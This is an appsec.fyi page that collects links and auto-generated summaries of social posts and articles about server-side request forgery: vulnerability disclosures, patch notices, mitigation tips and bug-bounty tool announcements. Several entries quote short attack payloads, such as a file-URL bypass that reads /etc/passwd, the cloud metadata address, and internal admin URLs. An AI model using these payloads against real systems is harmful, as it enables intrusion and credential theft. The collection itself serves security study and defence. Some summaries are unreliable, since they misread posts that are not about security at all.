appsec.fyi

A somewhat curated list of links to various topics in application security.

Server-Side Request Forgery (SSRF)

In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources. The attacker can supply or modify a URL which the code running on the server will read or submit data to, and by carefully selecting the URLs, the attacker may be able to read server configuration such as AWS metadata, connect to internal services like HTTP-enabled databases, or perform POST requests towards internal services which are not intended to be exposed.

From OWASP

ItemDate AddedLinkExcerpt
12025-10-06 21:58:42 UTCSplunk issued patches for six flaws including a High-severity blind SSRF (CVE-2025-20371) and XSS issues that could allow attackers to access sensitive data and crash the platform. #Splunk #SplunkSecurity #SSRF #XSS #CybersecuritySplunk recently released patches for six vulnerabilities, including a critical blind SSRF (CVE-2025-20371) and XSS flaws. These issues could be exploited by attackers to gain unauthorized access to sensitive data and potentially crash the Splunk platform. The patches aim to address these security vulnerabilities and enhance the overall cybersecurity of the Splunk system. #Splunk #SplunkSecurity #SSRF #XSS #Cybersecurity
22025-10-06 21:46:37 UTCWell Well Well. Its Another Day. (Oracle E-Business Suite Pre-Auth RCE Chain - CVE-2025-61882)The content discusses a security vulnerability in Oracle E-Business Suite, identified as CVE-2025-61882, allowing remote code execution without authentication. This pre-authentication exploit poses a significant risk to systems running the affected software. The article emphasizes the importance of promptly addressing this vulnerability to prevent potential cyber attacks and data breaches.
32025-10-06 12:53:33 UTCPayload-less exploits cause real damage without dropping malware SSRF XXE IDOR. Most scanners miss them. Recon chains catch them. Read more #CyberSecurity #AppSec #SSRF #XXE #IDOR #Recon #ThreatIntel #InfosecThe content discusses how payload-less exploits like SSRF, XXE, and IDOR can cause significant damage without dropping malware. These exploits are often missed by scanners but can be detected by recon chains. The post emphasizes the importance of understanding and addressing these vulnerabilities in cybersecurity to prevent potential threats. It encourages readers to learn more about these issues and provides relevant hashtags for further exploration.
42025-10-05 14:48:47 UTCSSRF attacker tricks your server into fetching URLs it shouldn't (internal admin or metadata). Stop it: dont fetch user URLs directly use allowlists block private/internal IPs enforce egress filters/proxy and require auth for internal services #WebSecurity #SSRF #InfoSecThe content warns about SSRF attacks where servers fetch unauthorized URLs. To prevent this, avoid fetching user URLs directly, use allowlists, block private/internal IPs, enforce egress filters/proxy, and require authentication for internal services. These measures enhance web security and protect against SSRF threats. #WebSecurity #SSRF #InfoSec
52025-10-03 19:43:14 UTCServer-Side Request Forgery (SSRF) is a rising web attack vector. An attacker can trick your app into making requests to internal or cloud resources. Learn what it is and how to prevent #AppSec #SSRF #CloudSecurity #CyberSecurityServer-Side Request Forgery (SSRF) is a growing web attack where attackers manipulate your app to access internal or cloud resources. Understanding SSRF is crucial for #AppSec, #CloudSecurity, and #CyberSecurity. Prevention measures are essential to safeguard against this threat.
62025-10-03 12:11:24 UTCCritical Splunk Vulnerabilities Affect Multiple VersionsThe content discusses critical vulnerabilities in Splunk affecting multiple versions. These vulnerabilities pose significant security risks and could potentially be exploited by attackers. It is important for users of Splunk to be aware of these vulnerabilities and take necessary actions to mitigate the risks, such as applying patches or updates provided by Splunk. Keeping systems up to date and implementing security best practices are crucial to safeguard against potential exploitation of these vulnerabilities.
72025-10-02 15:38:28 UTCHack this one! KNOXSS v4.3.0 released with support to #SSRF-based #XSS regular and Blind.KNOXSS v4.3.0 has been released with support for SSRF-based XSS, including regular and Blind XSS. This update allows for hacking opportunities using these vulnerabilities. The release aims to enhance security testing capabilities by addressing these specific types of cross-site scripting vulnerabilities.
82025-10-02 10:33:48 UTCHIGH severity SSRF in Apache Kylin (v4.0.05.0.2) lets attackers abuse admin rights for internal requests. Upgrade to 5.0.3 ASAP! Details: radar.offseq.com/threat/cve-202 #OffSeq #ApacheKylin #SSRF #CybersecurityA high severity Server-Side Request Forgery (SSRF) vulnerability in Apache Kylin (v4.0.0–5.0.2) allows attackers to exploit admin rights for internal requests. Urgent upgrade to version 5.0.3 is recommended to mitigate the risk. More information available at radar.offseq.com/threat/cve-202. Take action promptly to address this cybersecurity threat. #OffSeq #ApacheKylin #SSRF #Cybersecurity
92025-10-02 06:41:11 UTCSplunk Enterprise Vulnerabilities Allow Remote JavaScript Injection AttacksThe article discusses vulnerabilities in Splunk Enterprise that enable remote JavaScript injection attacks. These vulnerabilities could potentially allow attackers to inject malicious code into Splunk Enterprise instances, leading to security breaches. It highlights the importance of promptly addressing and patching these vulnerabilities to prevent unauthorized access and data compromise. The article serves as a warning to Splunk Enterprise users to stay vigilant and update their systems to protect against potential cyber threats.
102025-09-30 14:28:06 UTCKNOXSS v4.3.0 is out! Now with another Blind #XSS payload in a file format to catch Rendered Blind #SSRF-based scenarios Also a regular SSRF-based Reflected Remote XHTML Inclusion. Complete detection list below. knoxss.pro/?page_id=766 #BugBounty #WebAppSec #PenTestingKNOXSS v4.3.0 release includes a new Blind XSS payload in a file format for Rendered Blind SSRF-based scenarios and SSRF-based Reflected Remote XHTML Inclusion. The update enhances detection capabilities. More details can be found at knoxss.pro/?page_id=766. The release is relevant for Bug Bounty programs, Web Application Security, and Penetration Testing.
112025-09-29 15:28:25 UTCBefore the next update with #SSRF-based #XSS you can already use our completely free Blind XSS Service with SVG image generator. With that customized image with your unique ID in our system you can host online or upload manually to test Blind SSRF-based scenarios. #BugBountyThe content introduces a free Blind XSS Service with an SVG image generator to test Blind SSRF-based scenarios before the next update with SSRF-based XSS. Users can create a customized image with a unique ID in the system, which can be hosted online or uploaded manually for testing purposes. The service is offered for Bug Bounty hunters.
122025-09-27 18:13:38 UTCOn 1 page: Charles Barkla's 1904 @Nature report of polarization of x-rays at the Original Redbrick #SSRF @NIST @livuniphysics @aapmHQ @esrfsynchrotron @advancedphoton @EuropeanXFEL @DiamondLightSou @spring8pr @advlightsource @desynews @synchroSOLEILIn a concise 100-word summary, the content mentions Charles Barkla's 1904 report on x-ray polarization at the Original Redbrick. The post includes various Twitter handles related to physics institutions and synchrotron facilities. The link provided likely directs to further information on the topic.
132025-09-27 15:13:41 UTCThis version of the polyglot payload below can help in a bypass. The addition of the localhost gives room for most of the traditional host-based SSRF tricks. file://127.0.0.1/etc/passwd?/../passwd #SSRF #LFR #Bypass #BugBountyThe content discusses a polyglot payload that includes localhost to aid in bypassing security measures. By utilizing file://127.0.0.1/etc/passwd?/../passwd, traditional host-based SSRF tricks can be employed. The post also includes hashtags related to server-side request forgery (SSRF), local file read (LFR), bypass techniques, and bug bounty programs.
142025-09-26 18:18:22 UTCReleased check it out! brutelogic.net/ssrf-mastery-s #SSRF #BugBounty #PenTestingA new release is available on brutelogic.net focusing on SSRF mastery for Bug Bounty and Pen Testing. The content can be accessed at brutelogic.net/ssrf-mastery-s. The release is relevant for those interested in SSRF, Bug Bounty programs, and Pen Testing.
152025-09-26 15:13:48 UTCSSRF Mastery Series: Fundamentals The Complete Guide to Server-Side Request Forgery Discovery and Exploitation By @RodoAssis @BRuteLogic Check it out! #SSRF #BugBounty #PenTesting #WebAppSec brutelogic.net/ssrf-mastery-sThe content is about an SSRF Mastery Series that provides a comprehensive guide on Server-Side Request Forgery (SSRF) discovery and exploitation by @RodoAssis and @BRuteLogic. The series covers fundamentals and is aimed at Bug Bounty hunters, Penetration Testers, and Web Application Security enthusiasts. The link provided directs to brutelogic.net for more information. #SSRF #BugBounty #PenTesting #WebAppSec.
162025-09-26 13:13:23 UTCTalking about #SSRF I just got an idea to add SSRF-based #XSS to @KN0X55 ! It's coming in the update next week most probably. #WebAppSec #BugBounty #PenTestingThe content discusses adding SSRF-based XSS to a platform called @KN0X55 in an upcoming update next week. This idea was inspired by discussions around Server-Side Request Forgery (SSRF). The update aims to enhance security measures, particularly in the realms of web application security, bug bounty programs, and penetration testing. The post also includes relevant hashtags such as #WebAppSec, #BugBounty, and #PenTesting.
172025-09-26 08:11:31 UTCIMDS Abused: Hunting Rare Behaviors to Uncover ExploitsThe article discusses how attackers exploit vulnerabilities in the IMDS (Instance Metadata Service) by hunting for rare behaviors to uncover exploits. By analyzing unusual patterns and behaviors in IMDS usage, security researchers can detect potential threats and zero-day vulnerabilities. The focus is on understanding how attackers abuse IMDS to gain unauthorized access and compromise systems. The article emphasizes the importance of proactive monitoring and anomaly detection to protect against such attacks and prevent security breaches.
182025-09-25 20:08:13 UTCWeb Pentest Tip SSRF 1 What SSRF is 2 Why its dangerous 3 Lab-only vulnerable pattern 4 Mitigation & defenses Always test with authorization. #SSRF #WebSecurity #AppSec #Infosec #OWASP #Pentesting #CloudSecurityThe content provides a web pentest tip on Server-Side Request Forgery (SSRF), covering what SSRF is, why it's dangerous, lab-only vulnerable patterns, and mitigation strategies. It emphasizes the importance of testing with authorization to enhance security. The post includes relevant hashtags such as #SSRF, #WebSecurity, #AppSec, #Infosec, #OWASP, #Pentesting, and #CloudSecurity.
192025-09-25 17:13:23 UTCComing ASAP! #SSRF #BugBountyThe content indicates that something related to SSRF (Server-Side Request Forgery) and Bug Bounty is forthcoming soon. The hashtag #SSRF suggests a focus on SSRF vulnerabilities, while #BugBounty implies a potential reward for identifying and reporting bugs. The link provided likely leads to more details or updates on this upcoming development.
202025-09-25 02:49:55 UTCSide-by-Side Comparison of SSRF vs. CSRF | AttaxionThis content compares SSRF (Server-Side Request Forgery) and CSRF (Cross-Site Request Forgery) vulnerabilities, focusing on their targets, impact, and mitigation techniques. It highlights the differences between the two types of vulnerabilities to help readers understand their distinct characteristics and how to address them effectively.
212025-09-24 08:03:46 UTCProud to share I discovered MULTIPLE SSRF bypasses in the NPM ip lib (v2.0.1 10M weekly downloads): Null Route Bypass ("0") - CVE-2025-59437 Octal Format Bypass ("017700000001") - CVE-2025-59436 Impact: complete bypass of SSRF protections. #AppSec #SSRF #supplychainsecurityMultiple SSRF bypasses were discovered in the NPM ip lib (v2.0.1, 10M weekly downloads): Null Route Bypass ("0") - CVE-2025-59437 and Octal Format Bypass ("017700000001") - CVE-2025-59436. These bypasses allow for a complete bypass of SSRF protections, impacting supply chain security. #AppSec #SSRF #supplychainsecurity.
222025-09-24 07:41:42 UTCHackers Exploit Pandoc CVE-2025-51591 to Target AWS IMDS and Steal EC2 IAM CredentialsHackers are exploiting a vulnerability in Pandoc, identified as CVE-2025-51591, to target Amazon Web Services (AWS) Instance Metadata Service (IMDS) and steal EC2 Identity and Access Management (IAM) credentials. This security breach allows unauthorized access to sensitive information stored on AWS servers. It is crucial for AWS users to be aware of this threat and take necessary precautions to protect their data and credentials.
232025-09-23 18:58:17 UTCSRF vs CSRF arent the same One targets the server The other the user See the side by side comparison & protection tips: #Cybersecurity #SSRF #CSRF #AttaxionThe content highlights the differences between Server-Side Request Forgery (SSRF) and Cross-Site Request Forgery (CSRF). SSRF targets the server, while CSRF targets the user. The post suggests viewing a side-by-side comparison and offers protection tips for both vulnerabilities. It emphasizes the importance of cybersecurity and includes hashtags for SSRF, CSRF, and Attaxion.
242025-09-23 15:53:20 UTCServer leaking secrets? Thats SSRF! Conquered Intro to SSRF on @TryHackMe. Tips: 1) Tweak URL params (e.g. 127.0.0.1) for recon. 2) Use Burp Collaborator for blind SSRF. 3) Whitelist URLs. Whos next? #CyberSec #SSRF #TryHackMeThe content discusses Server-Side Request Forgery (SSRF) vulnerabilities and provides tips for exploiting them, such as manipulating URL parameters for reconnaissance, utilizing Burp Collaborator for blind SSRF attacks, and whitelisting URLs for protection. The author shares their success in mastering an "Intro to SSRF" challenge on TryHackMe and encourages others to try it. The post is tagged with #CyberSec, #SSRF, and #TryHackMe.
252025-09-23 14:53:24 UTCWarning: New #Flowise vulnerabilities were published. CVE-2025-59527 (CVSS 7.5) is a #SSRF vulnerability. CVE-2025-59528 (CVSS 10.0) could result in #RCE. Keep an eye on future security bulletins and #Patch #Patch #PatchNew vulnerabilities in #Flowise have been disclosed: CVE-2025-59527 is a #SSRF vulnerability with a CVSS score of 7.5, while CVE-2025-59528 poses a more severe risk with a CVSS score of 10.0, potentially leading to #RCE. It is crucial to stay updated on security bulletins and promptly apply patches to mitigate these vulnerabilities. #Patch #Patch #Patch.
262025-09-22 09:48:18 UTCServers making secret calls? SSRF attacks can expose internal systems! Prevent it: Validate & sanitize all user-input URLs. Test your endpoints with #DentiScan. #SSRF #CyberSecurity #WebSecuritySSRF attacks can expose internal systems by tricking servers into making secret calls. To prevent this, validate and sanitize all user-input URLs. Test your endpoints using #DentiScan for improved cybersecurity and web security. #SSRF #CyberSecurity #WebSecurity.
272025-09-22 07:48:41 UTCMEDIUM severity alert: MuYuCMS 2.02.7 vulnerable to SSRF via Add Friend Link! Remote attackers can probe internal resources. Audit & restrict input now. Details: #OffSeq #MuYuCMS #SSRFMuYuCMS version 2.0-2.7 is susceptible to SSRF through the Add Friend Link, allowing remote attackers to access internal resources. It is advised to audit and limit input to prevent exploitation. This vulnerability poses a medium severity risk and should be addressed promptly. #OffSeq #MuYuCMS #SSRF
282025-09-21 17:48:32 UTCFlask 3.1.1 SSRF Zero-Day Shodan dork exposed 500 targets 0day PoC (CWE-918) Full Article: nullsecurityx.codes/ssrf-vulnerabi Video: youtube.com/watch?v=Levx_p Responsible disclosure & defensive demo only. #infosec #vulnerability #SSRF #BugBountyA zero-day vulnerability in Flask 3.1.1 related to SSRF was exposed through a Shodan dork, revealing 500+ potential targets. A proof of concept (PoC) for this vulnerability (CWE-918) was shared. The full article and a video demonstrating the issue were provided. The disclosure was done responsibly, and a defensive demo was included. The content emphasizes information security, vulnerability, SSRF, and Bug Bounty programs. The details can be found at nullsecurityx.codes/ssrf-vulnerabi and the video is available on YouTube.
292025-09-21 17:48:32 UTCNew video: Flask 3.1.1 SSRF Zero-Day Shodan dork exposed 500 targets 0day PoC (CWE-918). Watch now youtube.com/watch?v=Levx_p Responsible disclosure & defensive demo only. #infosec #vulnerability #SSRF #BugBountyA new video exposes a Flask 3.1.1 SSRF Zero-Day vulnerability using a Shodan dork that revealed 500+ targets with a 0day Proof of Concept (CWE-918). The content emphasizes responsible disclosure and includes a defensive demo. The video can be watched on YouTube. The focus is on information security, vulnerability, SSRF, and Bug Bounty programs.
302025-09-21 10:48:30 UTCPREMIERE TONIGHT: Flask 3.1.1 SSRF Zero-Day (CWE-918) 8:00 PM (03) In this video: Discover 500 potential targets via Shodan dork PoC demo Turn on notifications so you dont miss it! Watch here: youtube.com/watch?v=Levx_p #BugBounty #CyberSecurity #SSRFA video premiering tonight at 8:00 PM showcases a Flask 3.1.1 SSRF Zero-Day vulnerability (CWE-918). The content includes a demonstration of discovering 500 potential targets using Shodan dork. Viewers are encouraged to turn on notifications to not miss the premiere. The video link is provided for watching. The focus is on Bug Bounty, Cybersecurity, and SSRF.
312025-09-20 18:51:11 UTCHow Tenable Found a Way To Bypass a Patch for BentoMLs Server-Side Request Forgery Vulnerability CVE-2025-54381Tenable discovered a method to bypass a patch for BentoML's Server-Side Request Forgery Vulnerability CVE-2025-54381. The content discusses this vulnerability and the workaround found by Tenable.
322025-09-20 18:43:38 UTCYou are Legend whatsapp.com/channel/0029Vb #BugBounty #SSRF #CVE2025The content refers to a potential bug bounty opportunity related to SSRF (Server-Side Request Forgery) and CVE-2025. It mentions a link (whatsapp.com/channel/0029Vb) and encourages individuals to explore it for a chance to showcase their skills in identifying security vulnerabilities. The post suggests that participants could potentially earn rewards for discovering and reporting any bugs or vulnerabilities found in the specified channel.
332025-09-20 18:43:37 UTCWe discovered an SSRF vulnerability in Flask 3.1.1 (CVE-2025-XXXX)! Our full video will be live soon on YouTube and blog For now early details are available only on our WhatsApp channel: whatsapp.com/channel/0029Vb #BugBounty #Cybersecurity #SSRF #FlaskA SSRF vulnerability was found in Flask 3.1.1 (CVE-2025-XXXX). Details are shared on a WhatsApp channel, with a full video coming soon on YouTube and a blog. The discovery is related to Bug Bounty, Cybersecurity, SSRF, and Flask. Stay tuned for more information.
342025-09-18 15:26:25 UTCEarly SSRF Reduces Mortality and Improves Outcomes in Functionally Dependent Rib Fracture Patients: StudyA study suggests that early surgical stabilization of rib fractures (SSRF) can reduce mortality and improve outcomes in functionally dependent patients with rib fractures. The research highlights the benefits of timely intervention in this patient population to enhance survival rates and overall recovery. Early SSRF is shown to be effective in improving outcomes for individuals with rib fractures who are functionally dependent.
352025-09-17 07:28:45 UTCSSRF via image upload: Server fetches image URLs to resize. Attacker supplies http://internal-api/admin. Blind SSRF internal admin access. #BugBountyTips #SSRF #LogicFlawsThe content discusses a Server-Side Request Forgery (SSRF) vulnerability through image upload where the server fetches image URLs to resize. An attacker can exploit this by supplying a malicious URL like http://internal-api/admin, gaining blind SSRF access to internal admin functions. This vulnerability highlights the importance of addressing logic flaws in web applications to prevent unauthorized access. The post also includes relevant hashtags like #BugBountyTips, #SSRF, and #LogicFlaws.
362025-09-16 09:23:42 UTCMetadata SSRF: SSRF to cloud metadata returns short-lived creds. Chain SSRF metadata use creds to call IMDS and pivot into cloud resources. #BugBountyTips #SSRF #CloudSecurityThe content discusses a security vulnerability called Metadata SSRF, where Server-Side Request Forgery (SSRF) is used to access cloud metadata and obtain short-lived credentials. By chaining SSRF to access metadata and using the obtained credentials to call the Instance Metadata Service (IMDS), attackers can pivot into cloud resources. This poses a risk to cloud security. The post also includes hashtags related to Bug Bounty Tips, SSRF, and Cloud Security.
372025-09-15 04:41:28 UTCServer-Side Request Forgery: What It Is & How To Fix ItThe content discusses Server-Side Request Forgery (SSRF), explaining what it is and providing solutions to fix it. SSRF is a vulnerability that allows attackers to make requests on behalf of the server, potentially leading to data breaches or unauthorized access. The article likely covers the importance of understanding and mitigating SSRF risks to protect servers and sensitive data. It may also offer guidance on implementing security measures to prevent SSRF attacks, safeguarding systems from exploitation. For detailed information, visit the provided link: https://www.wiz.io/academy/server-side-request-forgery.
382025-09-14 12:13:41 UTCBeen diving into SSRF this week. Still feels a bit confusing Its one of those vulnerabilities that opens a huge rabbit hole once you start connecting the dots. #BugBounty #SSRF #AppSec #CloudSecurity #InfoSecThe author has been exploring SSRF (Server-Side Request Forgery) this week and finds it confusing. SSRF is a vulnerability that leads to a complex investigation once connections are made. The post mentions #BugBounty, #SSRF, #AppSec, #CloudSecurity, and #InfoSec.
392025-09-14 08:13:19 UTCDive into the world of ethical hacking with this real-world cybersecurity challenge! In this video we demonstrate how open redirection and SSRF. #cybersecurity #ethicalhacking #ssrf #openredirectionThe content highlights a real-world cybersecurity challenge focusing on open redirection and SSRF. It invites viewers to explore ethical hacking through a video demonstration. Key hashtags include #cybersecurity, #ethicalhacking, #ssrf, and #openredirection. The video aims to provide practical insights into these cybersecurity concepts.
402025-09-10 23:58:27 UTCGitLab patched six critical vulnerabilities including CVE-2025-6454 enabling SSRF via webhook headers and DoS through SAML response file uploads and token ops. Discovered via HackerOne bounty. #GitLab #SSRF #BugBountyGitLab addressed six critical vulnerabilities, notably CVE-2025-6454, allowing SSRF via webhook headers and DoS through SAML response, file uploads, and token ops. These issues were identified through a HackerOne bounty program. The vulnerabilities have been patched to enhance the security of GitLab. #GitLab #SSRF #BugBounty.
412025-09-10 20:11:52 UTCGitLab Patches Vulnerabilities Allowing Denial of Service and SSRF AttacksGitLab has addressed vulnerabilities that could lead to Denial of Service (DoS) and Server-Side Request Forgery (SSRF) attacks. These vulnerabilities have been patched to prevent potential exploitation. It is crucial for GitLab users to update their systems promptly to mitigate the risk of these security threats.
422025-09-10 20:11:51 UTCMultiple Vulnerabilities in GitLab Patched Blocking DoS and SSRF Attack VectorsGitLab recently patched multiple vulnerabilities, preventing Denial of Service (DoS) and Server-Side Request Forgery (SSRF) attack vectors. These vulnerabilities posed potential security risks to GitLab users. The patches implemented by GitLab aim to enhance the platform's security and protect users from these types of attacks. Users are advised to update their GitLab installations promptly to ensure they are protected against these vulnerabilities.
432025-09-10 15:21:46 UTCGitLab Patches Multiple Vulnerabilities That Enables Denial Of Service and SSRF AttacksGitLab has fixed several vulnerabilities that could lead to Denial of Service (DoS) and Server-Side Request Forgery (SSRF) attacks. These vulnerabilities have been addressed to prevent potential security risks. It is crucial for GitLab users to update their systems to the latest patched versions to mitigate these security threats.
442025-09-08 11:38:32 UTCNew Research Alert! CVE-2025-8085 Unauthenticated SSRF in the WordPress Ditty plugin could allow attackers to pivot through your server into internal networks! Dive deep into the technical analysis and PoC here nullsecurityx.codes/cve-2025-8085- #WordPress #SSRF #BugBountyA new vulnerability, CVE-2025-8085, in the WordPress Ditty plugin allows unauthenticated SSRF attacks, potentially enabling attackers to access internal networks. Detailed technical analysis and a Proof of Concept (PoC) are available for review. The vulnerability poses a risk of server compromise and network infiltration. Stay informed about WordPress security issues and consider applying patches or updates to mitigate this threat. #WordPress #SSRF #BugBounty.
452025-09-08 05:38:28 UTCServer-Side Request Forgery (SSRF) Attackers trick servers into making malicious requests. Validate URLs restrict network access use allowlists. #SSRF #WebAppSecServer-Side Request Forgery (SSRF) involves attackers tricking servers into making malicious requests. To prevent SSRF attacks, it is crucial to validate URLs, restrict network access, and utilize allowlists. These measures help in controlling and securing server interactions, reducing the risk of unauthorized access and potential security breaches. #SSRF #WebAppSec.
462025-09-07 17:38:34 UTCExploited xmlrpc.php can be abused to trigger Blind SSRF via pingback.ping Old feature modern risk. #BugBounty #SSRF #infosec #appsec #CyberTamarin cybertamarin.medium.com/exploiting-worThe article discusses how the xmlrpc.php file can be exploited to trigger Blind Server-Side Request Forgery (SSRF) through the pingback.ping feature, highlighting the potential risks associated with this old feature in modern applications. The content emphasizes the relevance of this vulnerability in Bug Bounty programs and the fields of information security and application security. The author provides insights into exploiting this issue and its implications. The article can be found at cybertamarin.medium.com/exploiting-wor.
472025-09-07 10:33:26 UTCA high-severity flaw (CVE-2025-58179) in Astro's Cloudflare adapter allows attackers to bypass domain restrictions leading to SSRF and XSS attacks. #Astro #Cloudflare #Vulnerability #SSRF #WebSecurity securityonline.info/cve-2025-58179A critical vulnerability (CVE-2025-58179) in Astro's Cloudflare adapter enables attackers to evade domain restrictions, potentially triggering SSRF and XSS attacks. The flaw poses a significant risk to web security. #Astro #Cloudflare #Vulnerability #SSRF #WebSecurity.
482025-09-06 15:33:50 UTCWeb apps arent just about login screens. From blind SQL injection to SSRF and GraphQL flaws exploitation goes way beyond the basics. Hackers know it. Do you? #WebSecurity #CyberSecurity #HackingTips #SQLInjection #SSRF #APIsecurityThe content highlights that web app security extends beyond login screens, covering vulnerabilities like blind SQL injection, SSRF, and GraphQL flaws. It emphasizes the importance of understanding these advanced exploitation techniques to enhance web security. The post prompts readers to assess their knowledge in this area and includes hashtags related to web security, cybersecurity, hacking tips, SQL injection, SSRF, and API security.
492025-09-06 10:33:34 UTCCloud Metadata & Full Account Takeover Weve published the full article! Dive deeper into SSRF chaining cloud metadata access and full account takeover scenarios. Read the article: Video: #SSRF #BugBountyThe content discusses cloud metadata access and full account takeover through SSRF chaining. It invites readers to explore the detailed article and video on these scenarios. The focus is on understanding the risks associated with SSRF vulnerabilities and how they can lead to compromising cloud accounts. The content encourages readers to delve deeper into the topic to enhance their knowledge about potential security threats.
502025-09-06 10:33:33 UTCNew Video Alert! Learn how SSRF vulnerabilities can escalate to full cloud account takeover! Dive into advanced techniques cloud metadata access and Python exploit examples. Watch now: #SSRF #CyberSecurity #EthicalHacking #BugBountyThe content is about a new video discussing SSRF vulnerabilities leading to cloud account takeover. It covers advanced techniques, cloud metadata access, and Python exploit examples. The video is aimed at those interested in cybersecurity, ethical hacking, and bug bounty programs. It invites viewers to watch and learn more about SSRF vulnerabilities and their potential impact on cloud security.
512025-09-03 14:04:25 UTCSometimes it's as easy as this #ssrfThe content suggests that solutions can sometimes be simple, indicated by the hashtag #ssrf. It implies that finding resolutions to problems may not always be complicated. The link provided seems to lead to further information or context related to this idea.
522025-09-02 05:58:25 UTCI found an SSRF vuln scared because of teapot_bugcrowd @Bugcrowd coz if they get my report they will definitely closes as N/A without read the report! #BugBounty #bugcrowd #bughunting #ssrfThe content mentions the discovery of a Server-Side Request Forgery (SSRF) vulnerability by the user, who is concerned about reporting it to Bugcrowd due to fears that it may be closed without being read. The user expresses worry that the report will be marked as "N/A" without proper review. The post includes hashtags related to bug bounty programs, bug hunting, and SSRF.
532025-09-01 22:58:39 UTCCritical SSRF flaw in Docker Desktop containers lets attackers bypass isolation and hit the host directly. Patch now validate your network interfaces and watch out for unauthorized internal calls. Check the details here: #Docker #SSRF #CyberSecurityA critical SSRF flaw in Docker Desktop allows attackers to bypass isolation and access the host directly. It is crucial to patch the vulnerability, validate network interfaces, and monitor for unauthorized internal calls. Stay vigilant about security measures to prevent potential breaches. #Docker #SSRF #CyberSecurity.
542025-09-01 16:58:48 UTCServer-Side Request Forgery (SSRF) Attackers trick servers into making malicious requests. Validate URLs restrict network access use allowlists. #SSRF #WebAppSecServer-Side Request Forgery (SSRF) involves tricking servers into sending malicious requests. To prevent this attack, it is crucial to validate URLs, restrict network access, and utilize allowlists. These measures help in safeguarding against SSRF threats and enhancing web application security. #SSRF #WebAppSec.
552025-08-31 07:43:45 UTCSSRF Vulnerability in WordPress: what it is how attackers abuse it and exactly how to fix it (7 steps code). Guide: #WordPress #SSRF #CyberSecurity #AppSec #WebSecurity #DevSecOpsThe content discusses SSRF vulnerability in WordPress, explaining what it is, how attackers exploit it, and provides a 7-step guide with code to fix it. The guide aims to enhance cybersecurity, application security, web security, and DevSecOps practices related to WordPress. It emphasizes the importance of addressing SSRF vulnerabilities to protect websites from potential attacks.
| 56 | 2025-08-29 10:01:49 UTC | PhpSpreadsheet Library Vulnerability Enables Attackers to Feed Malicious HTML Input | A vulnerability in the PhpSpreadsheet library allows attackers to inject malicious HTML input. This security flaw can be exploited to execute harmful actions on systems using the library. It poses a risk of attacks that could compromise the integrity and security of systems utilizing PhpSpreadsheet. Users are advised to update to the latest version of the library to mitigate this vulnerability and enhance the security of their systems. |
| 57 | 2025-08-28 03:18:24 UTC | SSRF Tip: Test with payloads like or AWS . Use DNS loggers (Burp Collaborator) for blind SSRF. Prevention: whitelist domains #SSRF #BugBounty #WebSecurity #EthicalHacking | The content provides a tip for testing SSRF vulnerabilities using payloads like `http://169.254.169.254` or AWS. It suggests using DNS loggers like Burp Collaborator for blind SSRF testing. Prevention advice includes whitelisting domains. The post is related to SSRF, Bug Bounty, Web Security, and Ethical Hacking, emphasizing the importance of testing and securing against SSRF vulnerabilities. |
| 58 | 2025-08-27 17:13:15 UTC | New nationwide data on SSRF! Surgical stabilization of 3 rib fractures = Lower mortality (esp. flail chest!) Fewer lung complications when done early (82 hrs) Longer LOS Timely SSRF saves lives. Read below! #SSRF #CWIS @saranimd | New nationwide data shows that surgical stabilization of 3 or more rib fractures leads to lower mortality, especially in cases of flail chest. Performing the surgery early (within 82 hours) results in fewer lung complications but may lead to a longer length of stay. Timely surgical stabilization of rib fractures is crucial for saving lives. The content emphasizes the benefits of this procedure and provides a link for further information. #SSRF #CWIS @saranimd. |
| 59 | 2025-08-26 19:46:29 UTC | PhpSpreadsheet Vulnerability Allows Injection of Malicious HTML Input | The PhpSpreadsheet software has a vulnerability that enables the injection of malicious HTML input. This flaw can potentially lead to security risks and compromises. It is crucial for users of PhpSpreadsheet to be aware of this vulnerability and take necessary precautions to prevent any exploitation of the software. Regular updates and security measures should be implemented to mitigate the risk of malicious attacks through this vulnerability. |
| 60 | 2025-08-26 12:41:39 UTC | PhpSpreadsheet Library Vulnerability Lets Attackers Inject Malicious HTML Input | The PhpSpreadsheet library has a vulnerability that allows attackers to inject malicious HTML input. This vulnerability could be exploited by attackers to execute harmful actions on systems using the library. It is crucial for users of PhpSpreadsheet to be aware of this issue and take necessary precautions to prevent potential attacks. |
| 61 | 2025-08-26 08:11:19 UTC | Windows Docker Desktop Vulnerability Allows Full Host Compromise | A vulnerability in Windows Docker Desktop has been identified, potentially leading to a full host compromise. This vulnerability could allow attackers to gain unauthorized access to the host system. Users are advised to update their Docker Desktop installations to the latest version to mitigate the risk of exploitation. |
| 62 | 2025-08-26 04:23:48 UTC | A new report reveals a critical SSRF vulnerability in the PhpSpreadsheet library. The flaw could allow attackers to access internal networks and sensitive data. #CyberSecurity #PHP #Vulnerability #SSRF #OpenSource | A critical SSRF vulnerability in the PhpSpreadsheet library has been reported, potentially enabling attackers to access internal networks and sensitive data. This flaw poses a significant risk to cybersecurity and highlights the importance of addressing vulnerabilities promptly in open-source software like PhpSpreadsheet. #CyberSecurity #PHP #Vulnerability #SSRF #OpenSource |
| 63 | 2025-08-23 02:58:10 UTC | Vulnerability in the WordPress plugin Eventin 4.0.37 and earlier. The server can be used as a stepping stone without logging in. Risk of unauthorized access to internal systems. Risk of confidential information leakage and credential theft. Updating to the fixed version (4.0.38 or later) is recommended. Details #WordPress #Security #Eventin #SSRF | WordPress plugin "Eventin" versions 4.0.37 and below have a vulnerability allowing unauthorized server access, posing risks of unauthorized access to internal systems, data leaks, and credential theft. Upgrading to version 4.0.38 or higher is recommended to mitigate these risks. #WordPress #Security #Eventin #SSRF |
| 64 | 2025-08-22 12:56:15 UTC | Windows Docker Desktop Vulnerability Leads to Full Host Compromise | A vulnerability in Windows Docker Desktop has been discovered, potentially allowing attackers to compromise the entire host system. The vulnerability poses a serious security risk as it could lead to a full host compromise. It is crucial for users to be aware of this issue and take necessary precautions to mitigate the risk of exploitation. |
| 65 | 2025-08-22 06:53:28 UTC | #Day_13 of my bug bounty journey Studying: 0 h Hunting: 4:17 h Bugs&Reports: Just keep going... #bugbounty #ssrf | On Day 13 of the bug bounty journey, no time was spent studying, but 4 hours and 17 minutes were dedicated to hunting bugs. The focus was on persevering and continuing the bug bounty efforts. The hashtags #bugbounty and #ssrf were used to categorize the post. |
